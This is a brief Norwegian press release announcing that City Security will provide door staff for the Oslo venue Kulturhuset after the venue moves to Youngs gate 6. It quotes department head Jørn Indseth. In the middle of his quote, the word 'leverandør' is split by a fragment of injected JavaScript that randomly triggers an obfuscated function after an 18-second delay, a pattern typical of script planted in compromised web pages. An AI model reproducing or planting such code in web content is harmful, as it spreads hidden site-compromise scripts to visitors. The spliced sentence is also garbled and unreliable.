City Security vil om kort tid overta vaktholdet på et av Oslos mest populære utested, Kulturhuset. Det skjer i forbindelse med at Kulturhuset flytter til nye, flotte og større lokaler i Youngs gate 6. Kulturhuset får hele 2000 m2 som skal fylles med debatter, konserter, dans, utested, kunnskapsformidling, spill, kaffebar, mat hele døgnet og Oslos mest sosiale åpne kontorfellesskap.

-Vi er veldig glade for at Kulturhuset har valgt oss som leverandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andør av vakthold hos dem, sier avdelingsleder Jørn Indseth. Det blir et spennende oppdrag. For oss er det viktig at Kulturhuset får vaktlag med en god sammensetning av erfarne vektere, og ikke minst at overgangen til et nytt sted går bra.

Det blir Ordensvaktavdelingen til City Security som vil organisere oppdraget. Les mer om avdelingen.  For nærmere kontakt om oppdraget, kontakt avdelingsleder Jørn Indseth på jorn@citysecurity.no eller på telefon 95 28 25 68 .

Les mer og se hvor kulturhuset flytter: http://www.kulturhusetioslo.no/vi-flytter/